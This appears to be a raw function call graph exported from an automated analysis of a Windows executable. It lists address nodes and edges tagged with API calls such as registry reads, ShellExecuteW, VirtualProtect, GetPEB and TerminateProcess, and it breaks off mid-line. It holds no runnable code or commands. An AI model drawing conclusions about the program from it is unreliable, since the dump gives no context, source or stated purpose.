93972->93973 93974 73b3fd 93972->93974 93972->93979 93981 73bb85 93973->93981 93976 74f4ea 48 API calls 93974->93976 93977 73b407 93976->93977 93978 74f4ea 48 API calls 93977->93978 93978->93979 93979->93953 93980->93954 93982 73bb9b 93981->93982 93985 73bb96 _memcpy_s 93981->93985 93983 7a1b77 93982->93983 93984 74ee75 48 API calls 93982->93984 93984->93985 93985->93979 93986->93958 93988 73513f __wsetenvp 93987->93988 93989 735151 93988->93989 93990 7a1b27 93988->93990 93991 73bb85 48 API calls 93989->93991 93992 736b4a 48 API calls 93990->93992 93993 73515e _memcpy_s 93991->93993 93994 7a1b34 93992->93994 93993->93967 93995 74ee75 48 API calls 93994->93995 93996 7a1b57 _memcpy_s 93995->93996 93997 7a19cb 94002 732322 93997->94002 93999 7a19d1 94035 750f0a 52 API calls __cinit 93999->94035 94001 7a19db 94003 732344 94002->94003 94036 7326df 94003->94036 94008 73d7f7 48 API calls 94009 732384 94008->94009 94010 73d7f7 48 API calls 94009->94010 94011 73238e 94010->94011 94012 73d7f7 48 API calls 94011->94012 94013 732398 94012->94013 94014 73d7f7 48 API calls 94013->94014 94015 7323de 94014->94015 94016 73d7f7 48 API calls 94015->94016 94017 7324c1 94016->94017 94044 73263f 94017->94044 94021 7324f1 94022 73d7f7 48 API calls 94021->94022 94023 7324fb 94022->94023 94073 732745 94023->94073 94025 732546 94026 732556 GetStdHandle 94025->94026 94027 7325b1 94026->94027 94028 7a501d 94026->94028 94029 7325b7 CoInitialize 94027->94029 94028->94027 94030 7a5026 94028->94030 94029->93999 94080 7792d4 53 API calls 94030->94080 94032 7a502d 94081 7799f9 CreateThread 94032->94081 94034 7a5039 CloseHandle 94034->94029 94035->94001 94082 732854 94036->94082 94039 736a63 48 API calls 94040 73234a 94039->94040 94041 73272e 94040->94041 94096 7327ec 6 API calls 94041->94096 94043 73237a 94043->94008 94045 73d7f7 48 API calls 94044->94045 94046 73264f 94045->94046 94047 73d7f7 48 API calls 94046->94047 94048 732657 94047->94048 94097 7326a7 94048->94097 94051 7326a7 48 API calls 94052 732667 94051->94052 94053 73d7f7 48 API calls 94052->94053 94054 732672 94053->94054 94055 74f4ea 48 API calls 94054->94055 94056 7324cb 94055->94056 94057 7322a4 94056->94057 94058 7322b2 94057->94058 94059 73d7f7 48 API calls 94058->94059 94060 7322bd 94059->94060 94061 73d7f7 48 API calls 94060->94061 94062 7322c8 94061->94062 94063 73d7f7 48 API calls 94062->94063 94064 7322d3 94063->94064 94065 73d7f7 48 API calls 94064->94065 94066 7322de 94065->94066 94067 7326a7 48 API calls 94066->94067 94068 7322e9 94067->94068 94069 74f4ea 48 API calls 94068->94069 94070 7322f0 94069->94070 94071 7322f9 RegisterWindowMessageW 94070->94071 94072 7a1fe7 94070->94072 94071->94021 94074 732755 94073->94074 94075 7a5f4d 94073->94075 94076 74f4ea 48 API calls 94074->94076 94102 77c942 50 API calls 94075->94102 94078 73275d 94076->94078 94078->94025 94079 7a5f58 94080->94032 94081->94034 94103 7799df 54 API calls 94081->94103 94089 732870 94082->94089 94085 732870 48 API calls 94086 732864 94085->94086 94087 73d7f7 48 API calls 94086->94087 94088 732716 94087->94088 94088->94039 94090 73d7f7 48 API calls 94089->94090 94091 73287b 94090->94091 94092 73d7f7 48 API calls 94091->94092 94093 732883 94092->94093 94094 73d7f7 48 API calls 94093->94094 94095 73285c 94094->94095 94095->94085 94096->94043 94098 73d7f7 48 API calls 94097->94098 94099 7326b0 94098->94099 94100 73d7f7 48 API calls 94099->94100 94101 73265f 94100->94101 94101->94051 94102->94079 94104 7a8eb8 94108 77a635 94104->94108 94106 7a8ec3 94107 77a635 84 API calls 94106->94107 94107->94106 94109 77a66f 94108->94109 94114 77a642 94108->94114 94109->94106 94110 77a671 94140 74ec4e 81 API calls 94110->94140 94112 77a676 94119 73936c 94112->94119 94114->94109 94114->94110 94114->94112 94117 77a669 94114->94117 94115 77a67d 94116 73510d 48 API calls 94115->94116 94116->94109 94139 744525 61 API calls _memcpy_s 94117->94139 94120 739384 94119->94120 94137 739380 94119->94137 94121 7a4cbd __i64tow 94120->94121 94122 7a4bbf 94120->94122 94123 739398 94120->94123 94131 7393b0 __itow Mailbox _wcscpy 94120->94131 94124 7a4bc8 94122->94124 94125 7a4ca5 94122->94125 94141 75172b 80 API calls 3 library calls 94123->94141 94130 7a4be7 94124->94130 94124->94131 94148 75172b 80 API calls 3 library calls 94125->94148 94128 74f4ea 48 API calls 94129 7393ba 94128->94129 94129->94137 94142 73ce19 94129->94142 94132 74f4ea 48 API calls 94130->94132 94131->94128 94134 7a4c04 94132->94134 94135 74f4ea 48 API calls 94134->94135 94136 7a4c2a 94135->94136 94136->94137 94138 73ce19 48 API calls 94136->94138 94137->94115 94138->94137 94139->94109 94140->94112 94141->94131 94143 73ce28 __wsetenvp 94142->94143 94144 74ee75 48 API calls 94143->94144 94145 73ce50 _memcpy_s 94144->94145 94146 74f4ea 48 API calls 94145->94146 94147 73ce66 94146->94147 94147->94137 94148->94131 94149 73ef80 94152 743b70 94149->94152 94151 73ef8c 94153 7442a5 94152->94153 94154 743bc8 94152->94154 94278 77cc5c 86 API calls 4 library calls 94153->94278 94155 743bef 94154->94155 94157 7a6fd1 94154->94157 94159 7a6f7e 94154->94159 94166 7a6f9b 94154->94166 94156 74f4ea 48 API calls 94155->94156 94158 743c18 94156->94158 94266 78ceca 346 API calls Mailbox 94157->94266 94162 74f4ea 48 API calls 94158->94162 94159->94155 94163 7a6f87 94159->94163 94161 7a6fbe 94265 77cc5c 86 API calls 4 library calls 94161->94265 94185 743c2c _memcpy_s __wsetenvp 94162->94185 94263 78d552 346 API calls Mailbox 94163->94263 94166->94161 94264 78da0e 346 API calls 2 library calls 94166->94264 94169 7a73b0 94169->94151 94170 7a737a 94284 77cc5c 86 API calls 4 library calls 94170->94284 94171 7a7297 94274 77cc5c 86 API calls 4 library calls 94171->94274 94175 7440df 94275 77cc5c 86 API calls 4 library calls 94175->94275 94177 7a707e 94267 77cc5c 86 API calls 4 library calls 94177->94267 94179 74dce0 53 API calls 94179->94185 94184 73d645 53 API calls 94184->94185 94185->94153 94185->94170 94185->94171 94185->94175 94185->94177 94185->94179 94185->94184 94186 74f4ea 48 API calls 94185->94186 94188 7a72d2 94185->94188 94190 73fe30 346 API calls 94185->94190 94192 7a7350 94185->94192 94193 7a7363 94185->94193 94197 7442f2 94185->94197 94198 736a63 48 API calls 94185->94198 94199 7a72e9 94185->94199 94202 7a714c 94185->94202 94204 743f2b 94185->94204 94205 7a733f 94185->94205 94207 73d286 48 API calls 94185->94207 94211 74ee75 48 API calls 94185->94211 94212 736eed 48 API calls 94185->94212 94215 7a71e1 94185->94215 94224 73cdb9 94185->94224 94238 73d6e9 94185->94238 94242 73d9a0 94185->94242 94249 73d83d 53 API calls 94185->94249 94250 74c15c 48 API calls 94185->94250 94251 74c050 94185->94251 94262 74becb 346 API calls 94185->94262 94268 73dcae 50 API calls Mailbox 94185->94268 94269 78ccdc 48 API calls 94185->94269 94270 77a1eb 50 API calls 94185->94270 94186->94185 94276 77cc5c 86 API calls 4 library calls 94188->94276 94190->94185 94282 77cc5c 86 API calls 4 library calls 94192->94282 94283 77cc5c 86 API calls 4 library calls 94193->94283 94285 77cc5c 86 API calls 4 library calls 94197->94285 94198->94185 94277 77cc5c 86 API calls 4 library calls 94199->94277 94271 78ccdc 48 API calls 94202->94271 94204->94151 94281 77cc5c 86 API calls 4 library calls 94205->94281 94207->94185 94209 7a71a1 94273 74c15c 48 API calls 94209->94273 94211->94185 94212->94185 94215->94204 94280 77cc5c 86 API calls 4 library calls 94215->94280 94217 7a715f 94217->94209 94272 78ccdc 48 API calls 94217->94272 94218 7a71ce 94219 74c050 48 API calls 94218->94219 94221 7a71d6 94219->94221 94220 7a71ab 94220->94153 94220->94218 94221->94215 94222 7a7313 94221->94222 94279 77cc5c 86 API calls 4 library calls 94222->94279 94225 73cdfb 94224->94225 94230 73cdc5 94224->94230 94226 73ce04 94225->94226 94227 73ce0e 94225->94227 94228 736a63 48 API calls 94226->94228 94286 73bcce 94227->94286 94235 73cdf1 94228->94235 94231 74f4ea 48 API calls 94230->94231 94232 73cdd8 94231->94232 94233 73cde3 94232->94233 94234 7a4621 94232->94234 94233->94235 94237 73ce19 48 API calls 94233->94237 94234->94235 94236 73d7f7 48 API calls 94234->94236 94235->94185 94236->94235 94237->94235 94239 73d6f4 94238->94239 94241 73d71b 94239->94241 94292 73d764 94239->94292 94241->94185 94243 73d9b3 94242->94243 94244 73db7f 94242->94244 94245 73d7f7 48 API calls 94243->94245 94248 73d9c4 94243->94248 94244->94185 94246 73dbe1 94245->94246 94312 750f0a 52 API calls __cinit 94246->94312 94248->94185 94249->94185 94250->94185 94252 74c064 94251->94252 94254 74c069 Mailbox 94251->94254 94313 74c1af 48 API calls 94252->94313 94259 74c077 94254->94259 94314 74c15c 48 API calls 94254->94314 94256 74f4ea 48 API calls 94258 74c108 94256->94258 94257 74c152 94257->94185 94260 74f4ea 48 API calls 94258->94260 94259->94256 94259->94257 94261 74c113 94260->94261 94261->94185 94261->94261 94262->94185 94263->94204 94264->94161 94265->94157 94266->94185 94267->94204 94268->94185 94269->94185 94270->94185 94271->94217 94272->94217 94273->94220 94274->94175 94275->94204 94276->94199 94277->94204 94278->94204 94279->94204 94280->94204 94281->94204 94282->94204 94283->94204 94284->94204 94285->94169 94287 73bce8 94286->94287 94291 73bcdb 94286->94291 94288 74f4ea 48 API calls 94287->94288 94289 73bcf2 94288->94289 94290 74ee75 48 API calls 94289->94290 94290->94291 94291->94235 94293 73d9a0 53 API calls 94292->94293 94294 73d773 94293->94294 94295 73d781 94294->94295 94296 7a4490 94294->94296 94297 74f4ea 48 API calls 94295->94297 94311 73dcae 50 API calls Mailbox 94296->94311 94300 73d793 94297->94300 94299 7a449b 94299->94299 94301 73d7a1 94300->94301 94302 73d7f7 48 API calls 94300->94302 94303 73d7b0 94301->94303 94309 73dd47 48 API calls _memcpy_s 94301->94309 94302->94301 94305 74f4ea 48 API calls 94303->94305 94306 73d7ba 94305->94306 94310 73d8c0 53 API calls 94306->94310 94308 73d7e2 94308->94241 94309->94303 94310->94308 94311->94299 94312->94248 94313->94254 94314->94259 94315 1066030 94329 1063c80 94315->94329 94317 1066129 94332 1065f20 94317->94332 94335 1067150 GetPEB 94329->94335 94331 106430b 94331->94317 94333 1065f29 Sleep 94332->94333 94334 1065f37 94333->94334 94336 106717a 94335->94336 94336->94331 94337 7a9bec 94360 740ae0 _memcpy_s Mailbox 94337->94360 94339 741526 Mailbox 94418 77cc5c 86 API calls 4 library calls 94339->94418 94342 74f4ea 48 API calls 94362 73fec8 94342->94362 94343 7415b5 94419 77cc5c 86 API calls 4 library calls 94343->94419 94345 740509 94421 77cc5c 86 API calls 4 library calls 94345->94421 94346 74146e 94353 736eed 48 API calls 94346->94353 94348 741473 94420 77cc5c 86 API calls 4 library calls 94348->94420 94351 7aa246 94355 736eed 48 API calls 94351->94355 94352 7aa922 94366 73ffe1 Mailbox 94353->94366 94354 736eed 48 API calls 94354->94362 94355->94366 94358 7aa873 94359 73d7f7 48 API calls 94359->94362 94360->94339 94360->94362 94364 73ce19 48 API calls 94360->94364 94360->94366 94372 74f4ea 48 API calls 94360->94372 94374 7aa706 94360->94374 94376 7697ed InterlockedDecrement 94360->94376 94378 790d09 94360->94378 94383 73fe30 94360->94383 94412 78ef61 82 API calls 2 library calls 94360->94412 94413 78f0ac 90 API calls Mailbox 94360->94413 94414 77a6ef 48 API calls 94360->94414 94415 78e822 346 API calls Mailbox 94360->94415 94361 7aa30e 94361->94366 94416 7697ed InterlockedDecrement 94361->94416 94362->94342 94362->94343 94362->94345 94362->94346 94362->94348 94362->94351 94362->94354 94362->94359 94362->94361 94363 750f0a 52 API calls __cinit 94362->94363 94365 7697ed InterlockedDecrement 94362->94365 94362->94366 94368 7aa973 94362->94368 94381 741820 346 API calls 2 library calls 94362->94381 94382 741d10 59 API calls Mailbox 94362->94382 94363->94362 94364->94360 94365->94362 94422 77cc5c 86 API calls 4 library calls 94368->94422 94370 7aa982 94372->94360 94417 77cc5c 86 API calls 4 library calls 94374->94417 94376->94360 94423 78f8ae 94378->94423 94380 790d19 94380->94360 94381->94362 94382->94362 94384 73fe50 94383->94384 94407 73fe7e 94383->94407 94385 74f4ea 48 API calls 94384->94385 94385->94407 94386 74146e 94387 736eed 48 API calls 94386->94387 94409 73ffe1 94387->94409 94388 73d7f7 48 API calls 94388->94407 94390 740509 94552 77cc5c 86 API calls 4 library calls 94390->94552 94391 74f4ea 48 API calls 94391->94407 94393 750f0a 52 API calls __cinit 94393->94407 94395 7aa246 94400 736eed 48 API calls 94395->94400 94396 7aa922 94396->94360 94397 741473 94551 77cc5c 86 API calls 4 library calls 94397->94551 94398 736eed 48 API calls 94398->94407 94400->94409 94402 7aa873 94402->94360 94403 7aa30e 94403->94409 94549 7697ed InterlockedDecrement 94403->94549 94404 7697ed InterlockedDecrement 94404->94407 94406 7aa973 94553 77cc5c 86 API calls 4 library calls 94406->94553 94407->94386 94407->94388 94407->94390 94407->94391 94407->94393 94407->94395 94407->94397 94407->94398 94407->94403 94407->94404 94407->94406 94407->94409 94411 7415b5 94407->94411 94547 741820 346 API calls 2 library calls 94407->94547 94548 741d10 59 API calls Mailbox 94407->94548 94409->94360 94410 7aa982 94550 77cc5c 86 API calls 4 library calls 94411->94550 94412->94360 94413->94360 94414->94360 94415->94360 94416->94366 94417->94339 94418->94366 94419->94366 94420->94358 94421->94352 94422->94370 94424 73936c 81 API calls 94423->94424 94425 78f8ea 94424->94425 94430 78f92c Mailbox 94425->94430 94459 790567 94425->94459 94427 78f984 Mailbox 94428 78fb8b 94427->94428 94427->94430 94435 73936c 81 API calls 94427->94435 94519 7929e8 48 API calls _memcpy_s 94427->94519 94520 78fda5 60 API calls 2 library calls 94427->94520 94429 78fcfa 94428->94429 94434 78fb95 94428->94434 94523 790688 89 API calls Mailbox 94429->94523 94430->94380 94433 78fd07 94433->94434 94437 78fd13 94433->94437 94472 78f70a 94434->94472 94435->94427 94437->94430 94441 78fbc9 94486 74ed18 94441->94486 94444 78fbfd 94446 74c050 48 API calls 94444->94446 94445 78fbe3 94521 77cc5c 86 API calls 4 library calls 94445->94521 94449 78fc14 94446->94449 94448 78fbee GetCurrentProcess TerminateProcess 94448->94444 94450 741b90 48 API calls 94449->94450 94458 78fc3e 94449->94458 94452 78fc2d 94450->94452 94451 78fd65 94451->94430 94455 78fd7e FreeLibrary 94451->94455 94453 79040f 105 API calls 94452->94453 94453->94458 94455->94430 94458->94451 94490 741b90 94458->94490 94506 79040f 94458->94506 94522 73dcae 50 API calls Mailbox 94458->94522 94460 73bdfa 48 API calls 94459->94460 94461 790582 CharLowerBuffW 94460->94461 94524 771f11 94461->94524 94465 73d7f7 48 API calls 94466 7905bb 94465->94466 94531 7369e9 48 API calls _memcpy_s 94466->94531 94468 7905d2 94469 73b18b 48 API calls 94468->94469 94470 7905de Mailbox 94469->94470 94471 79061a Mailbox 94470->94471 94532 78fda5 60 API calls 2 library calls 94470->94532 94471->94427 94473 78f725 94472->94473 94477 78f77a 94472->94477 94474 74f4ea 48 API calls 94473->94474 94475 78f747 94474->94475 94476 74f4ea 48 API calls 94475->94476 94475->94477 94476->94475 94478 790828 94477->94478 94479 790a53 Mailbox 94478->94479 94485 79084b _strcat _wcscpy __wsetenvp 94478->94485 94479->94441 94480 73cf93 58 API calls 94480->94485 94481 73d286 48 API calls 94481->94485 94482 73936c 81 API calls 94482->94485 94483 75395c 47 API calls __crtGetStringTypeA_stat 94483->94485 94485->94479 94485->94480 94485->94481 94485->94482 94485->94483 94535 778035 50 API calls __wsetenvp 94485->94535 94488 74ed2d 94486->94488 94487 74edc5 VirtualProtect 94489 74ed93 94487->94489 94488->94487 94488->94489 94489->94444 94489->94445 94491 741cf6 94490->94491 94493 741ba2 94490->94493 94491->94458 94492 741bae 94500 741bb9 94492->94500 94537 74c15c 48 API calls 94492->94537 94493->94492 94495 74f4ea 48 API calls 94493->94495 94496 7a49c4 94495->94496 94497 74f4ea 48 API calls 94496->94497 94505 7a49cf 94497->94505 94498 741c5d 94498->94458 94499 74f4ea 48 API calls 94501 741c9f 94499->94501 94500->94498 94500->94499 94502 741cb2 94501->94502 94536 732925 48 API calls 94501->94536 94502->94458 94504 74f4ea 48 API calls 94504->94505 94505->94492 94505->94504 94507 790427 94506->94507 94512 790443 94506->94512 94508 7904f8 94507->94508 94509 79044f 94507->94509 94510 79042e 94507->94510 94507->94512 94545 779dc5 103 API calls 94508->94545 94516 73cdb9 48 API calls 94509->94516 94544 777c56 50 API calls _strlen 94510->94544 94511 79051e 94511->94458 94512->94511 94538 751c9d 94512->94538 94516->94512 94517 790438 94518 73cdb9 48 API calls 94517->94518 94518->94512 94519->94427 94520->94427 94521->94448 94522->94458 94523->94433 94526 771f3b __wsetenvp 94524->94526 94525 771f79 94525->94465 94525->94470 94526->94525 94527 771f6f 94526->94527 94528 771ffa 94526->94528 94527->94525 94533 74d37a 60 API calls 94527->94533 94528->94525 94534 74d37a 60 API calls 94528->94534 94531->94468 94532->94471 94533->94527 94534->94528 94535->94485 94536->94502 94537->94500 94539 751ca6 RtlFreeHeap 94538->94539 94540 751ccf __dosmaperr 94538->94540 94539->94540 94541 751cbb 94539->94541 94540->94511 94546 757c0e 47 API calls __getptd_noexit 94541->94546 94543 751cc1 GetLastError 94543->94540 94544->94517 94545->94512 94546->94543 94547->94407 94548->94407 94549->94409 94550->94409 94551->94402 94552->94396 94553->94410 94554 7a19dd 94559 734a30 94554->94559 94556 7a19f1 94579 750f0a 52 API calls __cinit 94556->94579 94558 7a19fb 94560 734a40 __ftell_nolock 94559->94560 94561 73d7f7 48 API calls 94560->94561 94562 734af6 94561->94562 94580 735374 94562->94580 94564 734aff 94587 73363c 94564->94587 94567 73518c 48 API calls 94568 734b18 94567->94568 94593 7364cf 94568->94593 94571 73d7f7 48 API calls 94572 734b32 94571->94572 94599 7349fb 94572->94599 94574 734b43 Mailbox 94574->94556 94575 7361a6 48 API calls 94578 734b3d _wcscat Mailbox __wsetenvp 94575->94578 94576 73ce19 48 API calls 94576->94578 94577 7364cf 48 API calls 94577->94578 94578->94574 94578->94575 94578->94576 94578->94577 94579->94558 94613 75f8a0 94580->94613 94583 73ce19 48 API calls 94584 7353a7 94583->94584 94615 73660f 94584->94615 94586 7353b1 Mailbox 94586->94564 94588 733649 __ftell_nolock 94587->94588 94622 73366c GetFullPathNameW 94588->94622 94590 73365a 94591 736a63 48 API calls 94590->94591 94592 733669 94591->94592 94592->94567 94594 73651b 94593->94594 94598 7364dd _memcpy_s 94593->94598 94596 74f4ea 48 API calls 94594->94596 94595 74f4ea 48 API calls 94597 734b29 94595->94597 94596->94598 94597->94571 94598->94595 94600 73bcce 48 API calls 94599->94600 94601 734a0a RegOpenKeyExW 94600->94601 94602 7a41cc RegQueryValueExW 94601->94602 94603 734a2b 94601->94603 94604 7a4246 RegCloseKey 94602->94604 94605 7a41e5 94602->94605 94603->94578 94606 74f4ea 48 API calls 94605->94606 94607 7a41fe 94606->94607 94624 7347b7 94607->94624 94610 7a423b 94610->94604 94611 7a4224 94612 736a63 48 API calls 94611->94612 94612->94610 94614 735381 GetModuleFileNameW 94613->94614 94614->94583 94616 75f8a0 __ftell_nolock 94615->94616 94617 73661c GetFullPathNameW 94616->94617 94618 736a63 48 API calls 94617->94618 94619 736643 94618->94619 94620 736571 48 API calls 94619->94620 94621 73664f 94620->94621 94621->94586 94623 73368a 94622->94623 94623->94590 94625 74f4ea 48 API calls 94624->94625 94626 7347c9 RegQueryValueExW 94625->94626 94626->94610 94626->94611 94627 755dfd 94628 755e09 __tzset_nolock 94627->94628 94664 757eeb GetStartupInfoW 94628->94664 94631 755e0e 94666 759ca7 GetProcessHeap 94631->94666 94632 755e66 94633 755e71 94632->94633 94748 755f4d 47 API calls 3 library calls 94632->94748 94667 757b47 94633->94667 94636 755e77 94637 755e82 __RTC_Initialize 94636->94637 94749 755f4d 47 API calls 3 library calls 94636->94749 94688 75acb3 94637->94688 94640 755e91 94641 755e9d GetCommandLineW 94640->94641 94750 755f4d 47 API calls 3 library calls 94640->94750 94707 762e7d GetEnvironmentStringsW 94641->94707 94644 755e9c 94644->94641 94647 755eb7 94648 755ec2 94647->94648 94751 75115b 47 API calls 3 library calls 94647->94751 94717 762cb4 94648->94717 94651 755ec8 94652 755ed3 94651->94652 94752 75115b 47 API calls 3 library calls 94651->94752 94731 751195 94652->94731 94655 755edb 94657 755ee6 __wwincmdln 94655->94657 94753 75115b 47 API calls 3 library calls 94655->94753 94735 733a0f 94657->94735 94659 755efa 94660 755f09 94659->94660 94754 7513f1 47 API calls _doexit 94659->94754 94755 751186 47 API calls _doexit 94660->94755 94663 755f0e __tzset_nolock 94665 757f01 94664->94665 94665->94631 94666->94632 94756 75123a 30 API calls 2 library calls 94667->94756 94669 757b4c 94757 757e23 InitializeCriticalSectionAndSpinCount 94669->94757 94671 757b51 94672 757b55 94671->94672 94759 757e6d TlsAlloc 94671->94759 94758 757bbd 50 API calls 2 library calls 94672->94758 94675 757b5a 94675->94636 94676 757b67 94676->94672 94677 757b72 94676->94677 94760 756986 94677->94760 94680 757bb4 94768 757bbd 50 API calls 2 library calls 94680->94768 94683 757b93 94683->94680 94685 757b99 94683->94685 94684 757bb9 94684->94636 94767 757a94 47 API calls 4 library calls 94685->94767 94687 757ba1 GetCurrentThreadId 94687->94636 94689 75acbf __tzset_nolock 94688->94689 94777 757cf4 94689->94777 94691 75acc6 94692 756986 __calloc_crt 47 API calls 94691->94692 94693 75acd7 94692->94693 94694 75ad42 GetStartupInfoW 94693->94694 94695 75ace2 __tzset_nolock @_EH4_CallFilterFunc@8 94693->94695 94702 75ae80 94694->94702 94704 75ad57 94694->94704 94695->94640 94696 75af44 94784 75af58 LeaveCriticalSection _doexit 94696->94784 94698 75aec9 GetStdHandle 94698->94702 94699 756986 __calloc_crt 47 API calls 94699->94704 94700 75aedb GetFileType 94700->94702 94701 75ada5 94701->94702 94705 75ade5 InitializeCriticalSectionAndSpinCount 94701->94705 94706 75add7 GetFileType 94701->94706 94702->94696 94702->94698 94702->94700 94703 75af08 InitializeCriticalSectionAndSpinCount 94702->94703 94703->94702 94704->94699 94704->94701 94704->94702 94705->94701 94706->94701 94706->94705 94708 755ead 94707->94708 94709 762e8e 94707->94709 94713 762a7b GetModuleFileNameW 94708->94713 94710 7569d0 __malloc_crt 47 API calls 94709->94710 94711 762eb4 _memcpy_s 94710->94711 94712 762eca FreeEnvironmentStringsW 94711->94712 94712->94708 94714 762aaf _wparse_cmdline 94713->94714 94715 7569d0 __malloc_crt 47 API calls 94714->94715 94716 762aef _wparse_cmdline 94714->94716 94715->94716 94716->94647 94718 762ccd __wsetenvp 94717->94718 94722 762cc5 94717->94722 94719 756986 __calloc_crt 47 API calls 94718->94719 94727 762cf6 __wsetenvp 94719->94727 94720 762d4d 94721 751c9d _free 47 API calls 94720->94721 94721->94722 94722->94651 94723 756986 __calloc_crt 47 API calls 94723->94727 94724 762d72 94725 751c9d _free 47 API calls 94724->94725 94725->94722 94727->94720 94727->94722 94727->94723 94727->94724 94728 762d89 94727->94728 94820 762567 47 API calls __wcsicmp_l 94727->94820 94821 756e20 IsProcessorFeaturePresent 94728->94821 94730 762d95 94730->94651 94732 7511a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94731->94732 94734 7511e0 __IsNonwritableInCurrentImage 94732->94734 94844 750f0a 52 API calls __cinit 94732->94844 94734->94655 94736 7a1ebf 94735->94736 94737 733a29 94735->94737 94738 733a63 IsThemeActive 94737->94738 94845 751405 94738->94845 94742 733a8f 94857 733adb SystemParametersInfoW SystemParametersInfoW 94742->94857 94744 733a9b 94858 733d19 94744->94858 94746 733aa3 SystemParametersInfoW 94747 733ac8 94746->94747 94747->94659 94748->94633 94749->94637 94750->94644 94754->94660 94755->94663 94756->94669 94757->94671 94758->94675 94759->94676 94762 75698d 94760->94762 94763 7569ca 94762->94763 94764 7569ab Sleep 94762->94764 94769 7630aa 94762->94769 94763->94680 94766 757ec9 TlsSetValue 94763->94766 94765 7569c2 94764->94765 94765->94762 94765->94763 94766->94683 94767->94687 94768->94684 94770 7630b5 94769->94770 94773 7630d0 __calloc_impl 94769->94773 94771 7630c1 94770->94771 94770->94773 94776 757c0e 47 API calls __getptd_noexit 94771->94776 94774 7630e0 HeapAlloc 94773->94774 94775 7630c6 94773->94775 94774->94773 94774->94775 94775->94762 94776->94775 94778 757d05 94777->94778 94779 757d18 EnterCriticalSection 94777->94779 94785 757d7c 94778->94785 94779->94691 94781 757d0b 94781->94779 94808 75115b 47 API calls 3 library calls 94781->94808 94784->94695 94786 757d88 __tzset_nolock 94785->94786 94787 757d91 94786->94787 94788 757da9 94786->94788 94809 7581c2 47 API calls 2 library calls 94787->94809 94791 757dc9 __tzset_nolock 94788->94791 94812 7569d0 94788->94812 94790 757d96 94810 75821f 47 API calls 8 library calls 94790->94810 94791->94781 94795 757d9d 94811 751145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94795->94811 94796 757dc4 94818 757c0e 47 API calls __getptd_noexit 94796->94818 94797 757dd3 94799 757cf4 __lock 46 API calls 94797->94799 94801 757dda 94799->94801 94803 757dfe 94801->94803 94804 757de9 InitializeCriticalSectionAndSpinCount 94801->94804 94806 751c9d _free 46 API calls 94803->94806 94805 757e04 94804->94805 94819 757e1a LeaveCriticalSection _doexit 94805->94819 94806->94805 94809->94790 94810->94795 94815 7569de 94812->94815 94813 75395c __crtGetStringTypeA_stat 46 API calls 94813->94815 94814 756a12 94814->94796 94814->94797 94815->94813 94815->94814 94816 7569f1 Sleep 94815->94816 94817 756a0a 94816->94817 94817->94814 94817->94815 94818->94791 94819->94791 94820->94727 94822 756e2b 94821->94822 94827 756cb5 94822->94827 94826 756e46 94826->94730 94828 756ccf _memset __call_reportfault 94827->94828 94829 756cef IsDebuggerPresent 94828->94829 94835 7581ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94829->94835 94832 756db3 __call_reportfault 94836 75a70c 94832->94836 94833 756dd6 94834 758197 GetCurrentProcess TerminateProcess 94833->94834 94834->94826 94835->94832 94837 75a714 94836->94837 94838 75a716 IsProcessorFeaturePresent 94836->94838 94837->94833 94840 7637b0 94838->94840 94843 76375f 5 API calls 2 library calls 94840->94843 94842 763893 94842->94833 94843->94842 94844->94734 94846 757cf4 __lock 47 API calls 94845->94846 94847 751410 94846->94847 94910 757e58 LeaveCriticalSection 94847->94910 94849 733a88 94850 75146d 94849->94850 94851 751477 94850->94851 94852 751491 94850->94852 94851->94852 94911 757c0e 47 API calls __getptd_noexit 94851->94911 94852->94742 94854 751481 94912 756e10 8 API calls __wcsicmp_l 94854->94912 94856 75148c 94856->94742 94857->94744 94859 733d26 __ftell_nolock 94858->94859 94860 73d7f7 48 API calls 94859->94860 94861 733d31 GetCurrentDirectoryW 94860->94861 94913 7361ca 94861->94913 94863 733d57 IsDebuggerPresent 94864 733d65 94863->94864 94865 7a1cc1 MessageBoxA 94863->94865 94866 733e3a 94864->94866 94868 7a1cd9 94864->94868 94869 733d82 94864->94869 94865->94868 94867 733e41 SetCurrentDirectoryW 94866->94867 94870 733e4e Mailbox 94867->94870 95089 74c682 48 API calls 94868->95089 94987 7340e5 94869->94987 94870->94746 94873 7a1ce9 94879 7a1cff SetCurrentDirectoryW 94873->94879 94875 733da0 GetFullPathNameW 94876 736a63 48 API calls 94875->94876 94877 733ddb 94876->94877 95003 736430 94877->95003 94879->94870 94881 733df6 94882 733e00 94881->94882 95090 7771fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94881->95090 95019 733e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94882->95019 94886 7a1d1c 94886->94882 94888 7a1d2d 94886->94888 94890 735374 50 API calls 94888->94890 94889 733e0a 94891 733e1f 94889->94891 94893 734ffc 67 API calls 94889->94893 94892 7a1d35 94890->94892 95027 73e8d0 94891->95027 94895 73ce19 48 API calls 94892->94895 94893->94891 94897 7a1d42 94895->94897 94898 7a1d49 94897->94898 94899 7a1d6e 94897->94899 94902 73518c 48 API calls 94898->94902 94901 73518c 48 API calls 94899->94901 94903 7a1d6a GetForegroundWindow ShellExecuteW 94901->94903 94904 7a1d54 94902->94904 94907 7a1d9e Mailbox 94903->94907 94906 73510d 48 API calls 94904->94906 94908 7a1d61 94906->94908 94907->94866 94909 73518c 48 API calls 94908->94909 94909->94903 94910->94849 94911->94854 94912->94856 95091 74e99b 94913->95091 94917 7361eb 94918 735374 50 API calls 94917->94918 94919 7361ff 94918->94919 94920 73ce19 48 API calls 94919->94920 94921 73620c 94920->94921 95108 7339db 94921->95108 94923 736216 Mailbox 94924 736eed 48 API calls 94923->94924 94925 73622b 94924->94925 95120 739048 94925->95120 94928 73ce19 48 API calls 94929 736244 94928->94929 94930 73d6e9 55 API calls 94929->94930 94931 736254 Mailbox 94930->94931 94932 73ce19 48 API calls 94931->94932 94933 73627c 94932->94933 94934 73d6e9 55 API calls 94933->94934 94935 73628f Mailbox 94934->94935 94936 73ce19 48 API calls 94935->94936 94937 7362a0 94936->94937 95123 73d645 94937->95123 94939 7362b2 Mailbox 94940 73d7f7 48 API calls 94939->94940 94941 7362c5 94940->94941 95133 7363fc 94941->95133 94945 7362df 94946 7a1c08 94945->94946 94947 7362e9 94945->94947 94948 7363fc 48 API calls 94946->94948 94949 750fa7 _W_store_winword 59 API calls 94947->94949 94950 7a1c1c 94948->94950 94951 7362f4 94949->94951 94953 7363fc 48 API calls 94950->94953 94951->94950 94952 7362fe 